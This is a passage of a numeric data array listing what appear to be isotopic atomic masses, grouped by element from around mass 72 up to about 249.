72.926765345, 73.922476436, 74.922523368, 75.919213597, 76.919914038,
77.91730909, 78.918499098, 79.916521271, 80.917992474, 81.916699401,
82.919118473, 83.918462354, 84.922245053, 85.924271579, 86.928521358,
87.931423998, 88.936450, 89.939960, 90.945960, 91.949920, 92.956290,
93.960490, 78.918337087, 66.964790, 67.958516, 68.950106, 69.944792,
70.93874, 71.936644572, 72.931691524, 73.929891034, 74.925776207,
75.924541469, 76.921379082, 77.921145706, 78.918337087, 79.918529296,
80.916290563, 81.916804119, 82.915180421, 83.916478974, 84.915608403,
85.918797577, 86.920711324, 87.924065926, 88.926385334, 89.930627737,
90.933968095, 91.939258714, 92.943050, 93.948680, 94.952870, 95.958530,
96.962800, 85.910610729, 68.965180, 69.955259, 70.949625738, 71.942092038,
72.939289195, 73.933084369, 74.930945746, 75.925910078, 76.92467,
77.920364783, 78.920082431, 79.916378965, 80.916592015, 81.9134836,
82.914136099, 83.911506687, 84.912527331, 85.910610729, 86.913354862,
87.914446969, 88.917630581, 89.919516555, 90.923445215, 91.92615621,
92.931274357, 93.934360, 94.939840, 95.943070, 96.948560, 97.951910,
98.957600, 99.961140, 84.911789737, 70.965320, 71.959080, 72.950561,
73.944264751, 74.93857, 75.935072226, 76.930408, 77.928141, 78.92398946,
79.92251925, 80.918995913, 81.918208598, 82.915109701, 83.914384821,
84.911789737, 85.911167419, 86.909180526, 87.911315588, 88.912278016,
89.914801694, 90.916536958, 91.9197289, 92.922041876, 93.926404946,
94.929302889, 95.934272637, 96.937351916, 97.941790668, 98.945379283,
99.949870, 100.953196445, 101.958870, 87.905612124, 72.965970,
73.956310, 74.949949568, 75.941766782, 76.937944782, 77.93218,
78.929708, 79.924521013, 80.923211846, 81.918401639, 82.917556701,
83.913425275, 84.912932803, 85.909260204, 86.908877124, 87.905612124,
88.907450675, 89.907737888, 90.910203095, 91.911037858, 92.914025634,
93.915361312, 94.919358766, 95.921696802, 96.926152923, 97.928452934,
98.933240926, 99.935351911, 100.940517888, 101.943018987, 102.948950,
103.952330, 104.958580, 88.905848295, 75.958450, 76.949645, 77.943610,
78.937351634, 79.93428, 80.929127468, 81.926792451, 82.922354243,
83.920388264, 84.916433039, 85.914885576, 86.91087573, 87.909501146,
88.905848295, 89.907151886, 90.907304791, 91.908949143, 92.909582713,
93.911595245, 94.912820621, 95.915891343, 96.918133995, 97.92220302,
98.924636204, 99.927756586, 100.93031385, 101.933555695, 102.936730,
103.941050, 104.944870, 105.949790, 106.954140, 107.959480,
89.904704416, 77.955230, 78.949160, 79.9404, 80.937210026, 81.931087,
82.928653801, 83.923250, 84.921471182, 85.916473591, 86.914816252,
87.910226904, 88.9088895, 89.904704416, 90.905645767, 91.905040847,
92.906476006, 93.906315192, 94.9080426, 95.908273386, 96.910953109,
97.912734892, 98.916512106, 99.917761889, 100.921140415, 101.922981285,
102.926599606, 103.928780, 104.933050, 105.935910, 106.940750,
107.943960, 108.949240, 109.952870, 92.906378058, 80.949030,
81.943130, 82.936705382, 83.933570, 84.927912447, 85.925038326,
86.920361108, 87.918332163, 88.913418245, 89.911264845,
90.906996243, 91.907193888, 92.906378058, 93.907283888, 94.906835792,
95.908100647, 96.908098556, 97.910328412, 98.911618375, 99.914181619,
100.915252025, 101.918037614, 102.919143842, 103.922464701,
104.923936545, 105.927970, 106.930310, 107.934840, 108.937630,
109.942440, 110.945650, 111.950830, 112.954700, 97.905408169, 82.948740,
83.940090, 84.936550, 85.930695904, 86.927326502, 87.921953241,
88.919480009, 89.913936896, 90.911750194, 91.906810991, 92.90681261,
93.905088269, 94.905842129, 95.904679477, 96.906021465, 97.905408169,
98.90771187, 99.907477336, 100.910347001, 101.91029736, 102.913207142,
103.913763625, 104.91697461, 105.918136802, 106.921692604, 107.923453,
108.927810, 109.929730, 110.934410, 111.936840, 112.941880, 113.944920,
114.950290, 98.906254747, 84.948830, 85.942880, 86.936530, 87.932678,
88.927167, 89.923556564, 90.918427639, 91.915260166, 92.910248984,
93.909657002, 94.907657084, 95.907871383, 96.906365358, 97.907215966,
98.906254747, 99.90765778, 100.907314659, 101.909215019, 102.909181351,
103.911447454, 104.911660566, 105.914357927, 106.915079572, 107.918461226,
108.919982665, 109.923820483, 110.92569283, 111.929146493, 112.931590,
113.935880, 114.938690, 115.943370, 116.946480, 117.951480, 101.904349312,
86.949180, 87.940260, 88.936110, 89.929890, 90.926292, 91.920120,
92.917052034, 93.911359711, 94.910412929, 95.907597835, 96.9075547,
97.905287132, 98.905939302, 99.904219476, 100.905582087, 101.904349312,
102.906323847, 103.905432701, 104.907752866, 105.907329433,
106.909905089, 107.910173465, 108.913203233, 109.914136041, 110.917696,
111.918965, 112.922487194, 113.924281, 114.928686173, 115.930810,
116.935580, 117.937820, 118.942840, 119.945310, 102.905504292,
88.948837, 89.942870, 90.936550, 91.931980, 92.925740, 93.921698,
94.91589874, 95.914460631, 96.911336797, 97.910708158, 98.908132104,
99.90812155, 100.906163625, 101.906843196, 102.905504292, 103.906655518,
104.905693821, 105.907287135, 106.906748423, 107.908728018, 108.908737289,
109.911136411, 110.911585913, 111.914394159, 112.915530627, 113.918806,
114.920334, 115.924062, 116.925980, 117.930070, 118.932110, 119.936410,
120.938720, 121.943210, 105.903485715, 90.949110, 91.940420, 92.935910,
93.928770, 94.924690, 95.918164359, 96.916479073, 97.912720902,
98.911767833, 99.908505886, 100.908289242, 101.905608544, 102.906087307,
103.904035834, 104.90508492, 105.903485715, 106.905133481, 107.903891701,
108.905950451, 109.905153254, 110.907670734, 111.907314058, 112.910152908,
113.910362638, 114.913683824, 115.914158662, 116.917841338, 117.9189843,
118.923110, 119.924691878, 120.928870, 121.930550, 122.934930, 123.936880,
106.90509682, 92.949780, 93.942780, 94.935480, 95.930680, 96.923972412,
97.921566201, 98.917597178, 99.916104255, 100.912802233, 101.911685,
102.90897272, 103.908629157, 104.906528661, 105.906668921, 106.90509682,
107.905955556, 108.904752292, 109.906107231, 110.905291157, 111.907004814,
112.906566579, 113.908803704, 114.908762698, 115.911359933, 116.911684562,
117.914582768, 118.915665059, 119.918787384, 120.919848046, 121.923530,
122.924900, 123.928640, 124.930430, 125.934500, 126.936770, 127.941170,
128.943690, 129.950448, 113.90335854, 94.949870, 95.939770, 96.934940,
97.927395546, 98.925010, 99.920289525, 100.918681538, 101.914462258,
102.913419246, 103.909849475, 104.909467905, 105.90645941, 106.906617928,
107.904183683, 108.904982293, 109.90300207, 110.904178107, 111.902757809,
112.904401662, 113.90335854, 114.905430969, 115.904755809, 116.907218618,
117.90691453, 118.909921597, 119.909850129, 120.912977363, 121.913332432,
122.917002999, 123.917647616, 124.92124637, 125.922353321, 126.926443864,
127.927762285, 128.932150, 129.933901937, 130.940670, 131.945550,
114.903878484, 96.949540, 97.942140, 98.934220, 99.931110851,
100.926340, 101.924090238, 102.919914188, 103.918296171, 104.91467354,
105.913465411, 106.9102951, 107.90969818, 108.907150507, 109.907165274,
110.905103278, 111.905532331, 112.904057761, 113.904913876,
114.903878484, 115.905259703, 116.904513564, 117.906354367, 118.90584535,
119.907959608, 120.907845822, 121.91027601, 122.910438276, 123.913175231,
124.913600588, 125.916463857, 126.917353091, 127.920172328, 128.92169698,
129.924970049, 130.926851767, 131.93299026, 132.937810, 133.944150,
134.949330, 119.902194676, 98.949330, 99.939044343, 100.936060,
101.930295324, 102.928100, 103.923143223, 104.921349437, 105.91688062,
106.915644329, 107.911925378, 108.911283214, 109.907842791, 110.90773446,
111.904818207, 112.905170577, 113.902778869, 114.903342397, 115.90174053,
116.902951656, 117.901603167, 118.90330763, 119.902194676, 120.90423548,
121.903439046, 122.905720838, 123.905273946, 124.907784125, 125.90765328,
126.910360024, 127.910536624, 128.913479, 129.913967295, 130.916999769,
131.917815713, 132.923829249, 133.928291765, 134.934730, 135.939340,
136.945990, 120.903815686, 102.939690, 103.936472, 104.931486348,
105.928791, 106.924150, 107.922160, 108.918132426, 109.916753, 110.913163,
111.912398009, 112.909371672, 113.909269, 114.906598, 115.906793629,
116.904835941, 117.905528731, 118.903942009, 119.905072427, 120.903815686,
121.905173651, 122.90421397, 123.905935743, 124.905253818, 125.90724748,
126.906923609, 127.909169001, 128.909148442, 129.911656324, 130.911982275,
131.914466896, 132.91525163, 133.920379744, 134.925165771, 135.930350,
136.935310, 137.940790, 138.945980, 129.906224399, 104.943640,
105.937504237, 106.935006, 107.929444597, 108.927415515, 109.922407316,
110.921110692, 111.917013672, 112.915891, 113.912089, 114.911902,
115.90846, 116.908644719, 117.905827581, 118.906403645, 119.904020222,
120.904936424, 121.903043898, 122.904270029, 123.902817896, 124.904430731,
125.903311696, 126.905226336, 127.904463056, 128.906598238, 129.906224399,
130.908523864, 131.90855316, 132.910955306, 133.911368737, 134.916448592,
135.920101246, 136.925322954, 137.929220, 138.934730, 139.938850,
140.944650, 141.949080, 126.904472681, 107.943475, 108.938149417,
109.935242, 110.930276, 111.927970, 112.923640583, 113.921850, 114.918048,
115.916808633, 116.91365, 117.913074, 118.910074, 119.910048173,
120.907366811, 121.907589284, 122.905588965, 123.906209852, 124.904630164,
125.905624153, 126.904472681, 127.905809443, 128.904987722, 129.906674247,
130.906124609, 131.907997381, 132.907796939, 133.909744465, 134.910048121,
135.914653993, 136.91787084, 137.922349591, 138.926099478, 139.931000,
140.935030, 141.940180, 142.944560, 143.949990, 131.904153457, 109.944278068,
110.941602, 111.935623112, 112.933341174, 113.927980306, 114.92629392,
115.921581087, 116.920358735, 117.916178655, 118.915410688, 119.911784244,
120.911461829, 121.908367632, 122.90848191, 123.905893003, 124.906395464,
125.904273634, 126.905183723, 127.903531275, 128.904779435, 129.903508007,
130.905082362, 131.904153457, 132.905910722, 133.905394464, 134.907227495,
135.907218794, 136.911562125, 137.913954475, 138.918792936, 139.921640943,
140.926648049, 141.92970959, 142.935110, 143.938510, 144.944070, 145.947750,
146.953560, 132.905451932, 111.950301, 112.944493274, 113.941450, 114.935910,
115.933367, 116.928670701, 117.926559494, 118.922377304, 119.920677253,
120.917229209, 121.916113434, 122.912996036, 123.912257798, 124.90972827,
125.909451977, 126.907417525, 127.907748866, 128.906064426, 129.906708552,
130.905463926, 131.90643426, 132.905451932, 133.906718475, 134.905977008,
135.907311576, 136.907089473, 137.911016704, 138.913363999, 139.917282354,
140.920045752, 141.924298927, 142.92735175, 143.932076914, 144.93552617,
145.940289423, 146.944155008, 147.949218153, 148.952930, 149.958170,
150.962190, 137.905247237, 113.950675405, 114.947370, 115.941380,
116.938499, 117.933040, 118.930659661, 119.926044974, 120.924054499,
121.919904, 122.918781036, 123.915093603, 124.914472912, 125.911250177,
126.911093797, 127.908317698, 128.908679439, 129.906320811, 130.906941118,
131.905061288, 132.90600749, 133.904508383, 134.905688591, 135.904575945,
136.905827384, 137.905247237, 138.908841341, 139.910604505, 140.914411009,
141.91645341, 142.920626719, 143.922952853, 144.927627032, 145.930219572,
146.934945, 147.937720047, 148.942580, 149.945680, 150.950810, 151.954270,
152.959610, 138.906353267, 116.950068, 117.946730, 118.940990, 119.938070,
120.933010, 121.930710, 122.926240, 123.924574275, 124.920816034,
125.919512667, 126.916375448, 127.915585177, 128.912692815, 129.912368724,
130.91007, 131.910101145, 132.908218, 133.908514011, 134.906976844,
135.907635536, 136.906493598, 137.90711193, 138.906353267, 139.909477645,
140.910962152, 141.91407913, 142.91606272, 143.919599647, 144.921645401,
145.92579346, 146.928235284, 147.932228868, 148.934734, 149.938770,
150.941720, 151.946250, 152.949620, 153.954500, 154.958350, 139.905438706,
118.952760, 119.946640, 120.943420, 121.937910, 122.935400, 123.930410,
124.928440, 125.923971, 126.922731, 127.918911, 128.918102, 129.914736,
130.914422, 131.911460487, 132.91151502, 133.908924821, 134.909151396,
135.907172422, 136.907805577, 137.905991321, 138.906652651, 139.905438706,
140.90827627, 141.909244205, 142.91238591, 143.913647336, 144.917233135,
145.918759009, 146.922673954, 147.92443241, 148.928399883, 149.930408931,
150.933976196, 151.936540, 152.940580, 153.943420, 154.948040, 155.951260,
156.956340, 140.907652769, 120.955364, 121.951810, 122.945960, 123.942960,
124.937830, 125.935310, 126.930830, 127.928791, 128.925095, 129.92359,
130.920259, 131.919255, 132.916330532, 133.915711737, 134.913111745,
135.912691611, 136.910705455, 137.910754636, 138.908938399, 139.909075874,
140.907652769, 141.910044806, 142.910816926, 143.913305245, 144.9145117,
145.917644336, 146.918995992, 147.922135026, 148.923717651, 149.926672997,
150.928318618, 151.931499225, 152.933838905, 153.937518153, 154.940120,
155.944270, 156.947430, 157.951980, 158.955500, 141.907723297, 123.952230,
124.948880, 125.943220, 126.940500, 127.935390, 128.933188, 129.928506,
130.927247, 131.923321237, 132.922348, 133.918790181, 134.91818116,
135.914976035, 136.914567137, 137.911949961, 138.911978288, 139.909552,
140.909609854, 141.907723297, 142.90981429, 143.910087274, 144.912573636,
145.913116939, 146.916100441, 147.916893288, 148.920148842, 149.920890888,
150.923828929, 151.924682219, 152.927698232, 153.929477307, 154.932932,
155.935018114, 156.939030, 157.941600, 158.946090, 159.949090, 160.953880,
144.912749023, 125.957520, 126.951630, 127.948420, 128.943160, 129.940450,
130.935870, 131.933750, 132.929782, 133.928353, 134.924876, 135.923565829,
136.920479493, 137.919548281, 138.916804082, 139.916041789, 140.913555054,
141.912874471, 142.910932616, 143.912590843, 144.912749023, 145.914696305,
146.915138545, 147.917474618, 148.918334155, 149.920983561, 150.921206973,
151.923496795, 152.924116889, 153.926463943, 154.928101267, 155.931056736,
156.933039369, 157.936561407, 158.938970, 159.942990, 160.945860,
161.950290, 162.953680, 151.919732425, 127.958080, 128.954640, 129.948920,
130.946110, 131.940690, 132.938670, 133.933970, 134.93252, 135.928275527,
136.926971746, 137.923243961, 138.922296605, 139.918994687, 140.918476488,
141.915197641, 142.914628338, 143.911999478, 144.913410353, 145.9130409,
146.914897923, 147.914822674, 148.917184735, 149.917275539, 150.919932409,
151.919732425, 152.922097356, 153.922209273, 154.924640161, 155.925527887,
156.928358717, 157.929991317, 158.933211271, 159.935140, 160.938830,
161.941220, 162.945360, 163.948280, 164.952980, 152.921230339, 129.963569,
130.957753, 131.954370, 132.949240, 133.946510, 134.941820, 135.939600,
136.935570, 137.933709, 138.92979228, 139.928087607, 140.92493072,
141.923434945, 142.920297509, 143.918816823, 144.916265237, 145.917205817,
146.916746111, 147.918085895, 148.917931238, 149.919701819, 150.919850161,
151.921744534, 152.921230339, 153.922979237, 154.92289326, 155.924752249,
156.925423647, 157.927845302, 158.929088861, 159.931971, 160.933680,
161.937040, 162.939210, 163.942990, 164.945720, 165.949970, 166.953210,
157.924103912, 133.955370, 134.952570, 135.947340, 136.945020, 137.940120,
138.938240, 139.933674, 140.932126, 141.928116, 142.92674951, 143.922963,
144.921709252, 145.918310608, 146.91909442, 147.918114524, 148.919340915,
149.918658876, 150.920348482, 151.919790996, 152.921749543, 153.920865598,
154.922622022, 155.922122743, 156.923960135, 157.924103912, 158.926388658,
159.927054146, 160.929669211, 161.930984751, 162.933990, 163.935860,
164.939380, 165.941600, 166.945570, 167.948360, 168.952870, 158.925346757,
135.961380, 136.955980, 137.953160, 138.948290, 139.945805049, 140.941448,
141.938744, 142.935121, 143.933045, 144.929274, 145.927246584, 146.924044585,
147.924271701, 148.923245909, 149.923659686, 150.923102543, 151.924074438,
152.923434588, 153.924678019, 154.923505236, 155.924747213, 156.924024604,
157.925413137, 158.925346757, 159.927167606, 160.927569919, 161.929488234,
162.930647536, 163.933350838, 164.934880, 165.937991959, 166.940050,
167.943640, 168.946220, 169.950250, 170.953300, 163.929174751, 137.962490,
138.959540, 139.954010, 140.951350, 141.946366, 142.943830, 143.939254,
144.937425, 145.932845369, 146.9310915, 147.927149831, 148.927304787,
149.925585184, 150.926184601, 151.9247183, 152.92576467, 153.924424457,
154.925753775, 155.92428311, 156.925466095, 157.924409487, 158.925739214,
159.925197517, 160.926933364, 161.926798447, 162.928731159, 163.929174751,
164.931703333, 165.932806741, 166.935655462, 167.937128769, 168.940307614,
169.942390, 170.946200, 171.948760, 172.953000, 164.93032207, 139.968539,
140.963098, 141.959770, 142.954610, 143.951480, 144.947200, 145.944640,
146.940056, 147.937718, 148.933774771, 149.933496182, 150.931688142,
151.931713714, 152.930198789, 153.930601579, 154.929103491, 155.929839,
156.928256188, 157.928941007, 158.927711959, 159.928729478, 160.927854776,
161.929095504, 162.928733903, 163.930233507, 164.93032207, 165.932284162,
166.933132633, 167.935515708, 168.936872273, 169.939618929, 170.94146515,
171.944820, 172.947290, 173.951150, 174.954050, 165.930293061, 142.966340,
143.960380, 144.957390, 145.952000, 146.949490, 147.944550, 148.942306,
149.937913839, 150.937448903, 151.935050389, 152.935063492, 153.932783081,
154.933208949, 155.931064698, 156.931916, 157.929893474, 158.930684066,
159.929083292, 160.929995309, 161.928778264, 162.930032749, 163.929200229,
164.930726003, 165.930293061, 166.932048159, 167.932370224, 168.934590364,
169.935464312, 170.938029808, 171.939356113, 172.942400, 173.944230,
174.947770, 175.950080, 176.954050, 168.93421325, 144.970073, 145.966425,
146.960961, 147.957840, 148.952720, 149.949960, 150.94548349, 151.944422,
152.942012112, 153.941567808, 154.939199459, 155.938979933, 156.936973,
157.936979525, 158.934975, 159.935262801, 160.933549, 161.933994682,
162.932651124, 163.93356, 164.932435492, 165.933554131, 166.932851622,
167.934172776, 168.93421325, 169.935801397, 170.93642944, 171.938400044,
172.939603607, 173.942168605, 174.943836853, 175.946994685, 176.949040,
177.952640, 178.955340, 173.938862089, 147.967420, 148.964040, 149.958420,
150.955400769, 151.950288919, 152.949480, 153.946393928, 154.945782332,
155.942818215, 156.942627848, 157.939865617, 158.940050099, 159.937552344,
160.937901678, 161.93576821, 162.936334305, 163.934489416, 164.935279,
165.933882042, 166.934949605, 167.933896895, 168.935189802, 169.934761837,
170.936325799, 171.936381469, 172.938210787, 173.938862089, 174.94127645,
175.942571683, 176.945260822, 177.94664668, 178.950170, 179.952330,
180.956150, 174.940771819, 149.973228, 150.967577, 151.964120,
152.958767331, 153.957522, 154.954316216, 155.953032523, 156.9500983,
157.949313283, 158.946628776, 159.946033, 160.943572, 161.943277288,
162.941179, 163.941339, 164.939406724, 165.939859, 166.93827,
167.938739111, 168.937651439, 169.938474968, 170.937913136, 171.939085669,
172.938930602, 173.94033748, 174.940771819, 175.94268631, 176.943758055,
177.945954559, 178.947327443, 179.94988116, 180.951970, 181.955040,
182.957570, 183.960910, 179.946549953, 152.970690, 153.964860, 154.963390,
155.959364025, 156.958396, 157.954799366, 158.95399487, 159.950684379,
160.950274844, 161.947210498, 162.947089, 163.944367284, 164.944567,
165.94218, 166.9426, 167.940568, 168.941259, 169.939609, 170.940492,
171.939448301, 172.940513, 173.940046178, 174.941509181, 175.941408631,
176.943220651, 177.943698766, 178.945816145, 179.946549953, 180.949101246,
181.950554096, 182.953530439, 183.955446515, 184.958820, 185.960890,
186.964590, 187.966850, 180.947995763, 154.974592, 155.972303,
156.968192445, 157.966699, 158.963018173, 159.961486056, 160.958417,
161.957291859, 162.954330271, 163.953534, 164.950772514, 165.950512,
166.948093, 167.948047, 168.946011, 169.946175, 170.944476, 171.944895,
172.94375, 173.944454, 174.943737, 175.944857, 176.944472403,
177.945778221, 178.945929535, 179.947464831, 180.947995763, 181.950151849,
182.951372616, 183.954007966, 184.955559375, 185.958552023, 186.960530,
187.963700, 188.965830, 189.969230, 183.950931188, 157.974562, 158.972918,
159.968478805, 160.967357, 161.963497417, 162.962523542, 163.958954382,
164.958279949, 165.955027253, 166.954816014, 167.951808394, 168.95177879,
169.949228482, 170.949451, 171.947292, 172.947689, 173.946079, 174.946717,
175.945634, 176.946643, 177.945876236, 178.947070447, 179.946704459,
180.948197248, 181.948204156, 182.950222951, 183.950931188, 184.953419264,
185.954364127, 186.957160466, 187.958489105, 188.961912868, 189.963181378,
190.966600, 191.968170, 186.955753109, 159.982115, 160.977589119,
161.976002, 162.972080535, 163.970323, 164.967088557, 165.965808,
166.962601, 167.961572608, 168.958791096, 169.958220071, 170.955716,
171.955422961, 172.953243, 173.953115, 174.951381, 175.951623, 176.950328,
177.950989, 178.949987641, 179.950789084, 180.950067916, 181.95121008,
182.950819841, 183.952520756, 184.952954982, 185.954986084, 186.955753109,
187.958114438, 188.959229007, 189.961817977, 190.963125242, 191.965960,
192.967470, 193.970420, 191.96148069, 161.984431, 162.982690,
163.978035649, 164.976762, 165.972690753, 166.971547969, 167.967803678,
168.96701927, 169.963577028, 170.963184819, 171.960023303, 172.959808409,
173.957062202, 174.956945835, 175.954806, 176.954965324, 177.953251241,
178.953816017, 179.952378803, 180.953244, 181.952110186, 182.953126102,
183.952489071, 184.954042265, 185.953838158, 186.955750458, 187.955838228,
188.95814747, 189.958447048, 190.960929718, 191.96148069, 192.964151563,
193.965182083, 194.968126661, 195.969639333, 192.96292643, 163.992201,
164.987520, 165.985824, 166.981665156, 167.979881, 168.976294942, 169.974965,
170.971626042, 171.970456, 172.967501739, 173.966861045, 174.964112895,
175.963648688, 176.9613015, 177.961082, 178.959122266, 179.959229446,
180.957625297, 181.958076296, 182.956846458, 183.957476, 184.956698,
185.957946104, 186.957363361, 187.958853121, 188.958718935, 189.960545968,
190.960594046, 191.962605012, 192.96292643, 193.965078378, 194.965979573,
195.968396542, 196.969653285, 197.972280, 198.973804583, 194.964791134,
165.994855, 166.992979, 167.988150742, 168.986715, 169.982495289,
170.981244542, 171.977347128, 172.976444754, 173.972818767, 174.972420552,
175.968944622, 176.968469481, 177.965648724, 178.965363404, 179.963031477,
180.963097285, 181.961170656, 182.961596703, 183.959922251, 184.960619,
185.959350813, 186.960587, 187.959395391, 188.960833686, 189.959931655,
190.961676661, 191.961038005, 192.962987401, 193.962680253, 194.964791134,
195.964951521, 196.967340182, 197.96789279, 198.970593094, 199.971440677,
200.974512868, 201.975740, 196.966568662, 168.998080, 169.996122,
170.991878881, 171.990035, 172.98623738, 173.984761, 174.981274107,
175.980099, 176.976864908, 177.97603192, 178.973212812, 179.972521124,
180.970079048, 181.969617874, 182.967593034, 183.967451524, 184.965789411,
185.965952703, 186.964567541, 187.965323661, 188.963948286, 189.964700339,
190.963704225, 191.964812953, 192.964149715, 193.96536525, 194.96503464,
195.966569813, 196.966568662, 197.968242303, 198.968765193, 199.970725647,
200.97165724, 201.973805838, 202.975154542, 203.977724, 204.979870,
201.970643011, 171.003760, 171.998832686, 172.997242, 173.992863695,
174.99142327, 175.98735458, 176.986279158, 177.982483143, 178.981833861,
179.978266394, 180.977819311, 181.974689964, 182.974449841, 183.971713051,
184.971899086, 185.96936179, 186.969814236, 187.967577049, 188.968190034,
189.966322449, 190.967157105, 191.965634327, 192.966665421, 193.965439409,
194.966720113, 195.965832649, 196.967212908, 197.966769032, 198.968279932,
199.968326004, 200.970302268, 201.970643011, 202.972872484, 203.973493933,
204.976073386, 205.977514066, 206.982588545, 207.985940, 208.991040,
209.994510, 204.974427541, 176.000590, 176.996427286, 177.994897,
178.991089082, 179.989906, 180.986257447, 181.985667104, 182.982192802,
183.981873122, 184.978791305, 185.978325, 186.975905897, 187.976009782,
188.973588428, 189.973877149, 190.971786154, 191.972225, 192.970672,
193.9712, 194.969774335, 195.970481151, 196.969574511, 197.970483495,
198.969877, 199.970962672, 200.970818891, 201.972105808, 202.97234422,
203.973863522, 204.974427541, 205.97611032, 206.977419429, 207.9820187,
208.985358952, 209.990073689, 210.993477, 211.998228, 207.976652071,
178.003830191, 179.002150, 179.997918173, 180.996623958, 181.992671842,
182.991874629, 183.988142339, 184.987609944, 185.984238945, 186.98391837,
187.980874338, 188.980807, 189.978081517, 190.978265, 191.975785171,
192.976173234, 193.97401207, 194.97454205, 195.972774109, 196.973431124,
197.972033959, 198.97291665, 199.971826675, 200.972884511, 201.972159133,
202.973390521, 203.973043589, 204.974481755, 205.974465278, 206.975896887,
207.976652071, 208.98109012, 209.984188527, 210.988736964, 211.991897543,
212.996581499, 213.999805408, 215.004807, 208.980398734, 184.001124,
184.997625, 185.996597625, 186.993157835, 187.992265154, 188.989199012,
189.988295129, 190.985786119, 191.985457954, 192.982959771, 193.98283396,
194.980650737, 195.980666509, 196.978864454, 197.979206, 198.977671961,
199.978131829, 200.977009036, 201.977742324, 202.976876001, 203.977812736,
204.977389366, 205.97849913, 206.978470679, 207.979742196, 208.980398734,
209.984120371, 210.98726946, 211.991285724, 212.994384666, 213.998711539,
215.001769776, 216.006305943, 217.009470, 218.014316, 208.982430435,
187.999422048, 188.998480562, 189.995101185, 190.994574485, 191.991335149,
192.991025275, 193.988185606, 194.988110728, 195.98553458, 196.98565963,
197.983388616, 198.983666063, 199.981798604, 200.982259764, 201.980757541,
202.981420103, 203.980318121, 204.981203322, 205.980481099, 206.981593173,
207.981245702, 208.982430435, 209.982873673, 210.986653154, 211.988867969,
212.99285728, 213.99520135, 214.999419988, 216.001915035, 217.006334796,
218.008973037, 219.013744, 220.016602, 210.987496271, 192.999843112,
193.998725085, 194.996268098, 195.995788077, 196.993189215, 197.992837202,
198.990532254, 199.990351264, 200.988416999, 201.988630236, 202.986941984,
203.987251326, 204.986074483, 205.986667036, 206.985783502, 207.986589977,
208.986173143, 209.98714771, 210.987496271, 211.990744771, 212.992936646,
213.996371733, 214.99865257, 216.002423257, 217.004718822, 218.008694336,
219.011161691, 220.015407682, 221.018050, 222.022330, 223.025190,
222.017577738, 195.005437696, 196.002115223, 197.001584351, 197.998678663,
198.998370297, 199.9956993, 200.995628335, 201.993263492, 202.993386687,
203.99142874, 204.991718799, 205.990214104, 206.990734225, 207.98964247,
208.990414742, 209.989696216, 210.990600523, 211.990703529, 212.993882668,
213.995362554, 214.998745483, 216.00027437, 217.003927675, 218.005601256,
219.009480204, 220.011393981, 221.015536782, 222.017577738, 223.021790,
224.024090, 225.028440, 226.030890, 227.035407, 228.037986, 222.01755173,
199.007258147, 200.00657249, 201.003860867, 202.003372847, 203.000924647,
204.000653204, 204.99859396, 205.998666066, 206.996949414, 207.997138783,
208.995953555, 209.996407738, 210.995536544, 211.996202244, 212.996189081,
213.998971145, 215.000341497, 216.00319799, 217.004631951, 218.007578322,
219.009252149, 220.012327405, 221.014254762, 222.01755173, 223.019735857,
224.023249951, 225.025565414, 226.029386231, 227.031835938, 228.035729,
229.038450228, 230.042510, 231.045440, 232.049772, 228.031070292,
202.009890686, 203.009271619, 204.006499668, 205.00626857, 206.00382727,
207.003798105, 208.00183994, 209.001991373, 210.000494978, 211.000897987,
211.999794499, 213.000383959, 214.000107894, 215.002719834, 216.003533035,
217.006320327, 218.00714023, 219.010085078, 220.011028384, 221.013917338,
222.01537453, 223.018502171, 224.020211821, 225.023611564, 226.025409823,
227.029177842, 228.031070292, 229.034957577, 230.037056394, 231.041220,
232.043638, 233.048060, 234.050704, 227.027752127, 206.01450498,
207.011949748, 208.011551551, 209.009494863, 210.009435986, 211.007734835,
212.007813822, 213.006607643, 214.006901798, 215.006453625, 216.008720075,
217.009346914, 218.011641453, 219.012420389, 220.014762979, 221.015591248,
222.017843851, 223.019137468, 224.021722866, 225.023229585, 226.026098089,
227.027752127, 228.031021112, 229.033015243, 230.036294178, 231.038558786,
232.042027438, 233.044550, 234.048420, 235.051232, 236.055296,
232.038055325, 209.017715682, 210.015075342, 211.014928413, 212.012980288,
213.01301014, 214.01149977, 215.01173033, 216.011062115, 217.013114328,
218.013284499, 219.015536895, 220.015747762, 221.018183674, 222.018468121,
223.020811448, 224.021466895, 225.023951021, 226.024903069, 227.02770407,
228.028741127, 229.03176243, 230.033133843, 231.036304343, 232.038055325,
233.041581843, 234.04360123, 235.047510074, 236.049870, 237.053894,
238.056496, 231.03588399, 212.023204138, 213.02110934, 214.020918417,
215.019185865, 216.019109564, 217.018323986, 218.020041889, 219.019883143,
220.021875303, 221.021877983, 222.023742, 223.023962273, 224.025625738,
225.026130678, 226.027947753, 227.028805072, 228.031051376, 229.032096793,
230.034540754, 231.03588399, 232.038591592, 233.040247277, 234.043308058,
235.045443615, 236.048681284, 237.051145659, 238.05450271, 239.057260,
240.060980, 238.050788247, 217.024368791, 218.023535671, 219.02491916,
220.024723, 221.026399, 222.026086, 223.0277386, 224.027604778,
225.029390717, 226.029338702, 227.031156367, 228.031374006, 229.033505939,
230.033939784, 231.036293704, 232.037156152, 233.039635207, 234.040952088,
235.043929918, 236.045568006, 237.048730184, 238.050788247, 239.054293299,
240.056591988, 241.060330, 242.062931, 237.048173444, 225.033913933,
226.035145, 227.034956789, 228.036180, 229.036263808, 230.037827597,
231.038245085, 232.040108, 233.040740546, 234.042895038, 235.044063267,
236.0465696, 237.048173444, 238.050946405, 239.052939025, 240.056162182,
241.058252431, 242.06164118, 243.064279, 244.067850, 242.058742611,
228.038742328, 229.040150212, 230.039649886, 231.041101107, 232.041187097,
233.042997375, 234.043317076, 235.04528605, 236.046057964, 237.048409658,
238.049559894, 239.052163381, 240.053813545, 241.056851456, 242.058742611,
243.062003092, 244.064203907, 245.067747154, 246.070204627, 247.074070,
243.06138108, 231.045560, 232.046590, 233.046348, 234.047809, 235.047946,
236.049579, 237.049996, 238.051984324, 239.053024479, 240.055300179,
241.056829144, 242.059549159, 243.06138108, 244.064284847, 245.066452114,
246.069774619, 247.072093, 248.075752, 249.078480, 247.07035354,
233.050771232, 234.050159841, 235.051434, 236.051413, 237.052901,
238.053028697, 239.054957, 240.055529539, 241.057653001, 242.058835824,
243.061389114, 244.062752578, 245.065491249, 246.067223662, 247.07035354,
248.072348508, 249.075953413, 250.078356959, 251.082284605, 252.084870,
247.07030708, 235.056580, 236.057330, 237.057003, 238.058281, 239.058279,
240.059759, 241.060230, 242.061981, 243.063007572, 244.065180774,
245.066361616, 246.068672947, 247.07030708, 248.073086, 249.074986657,
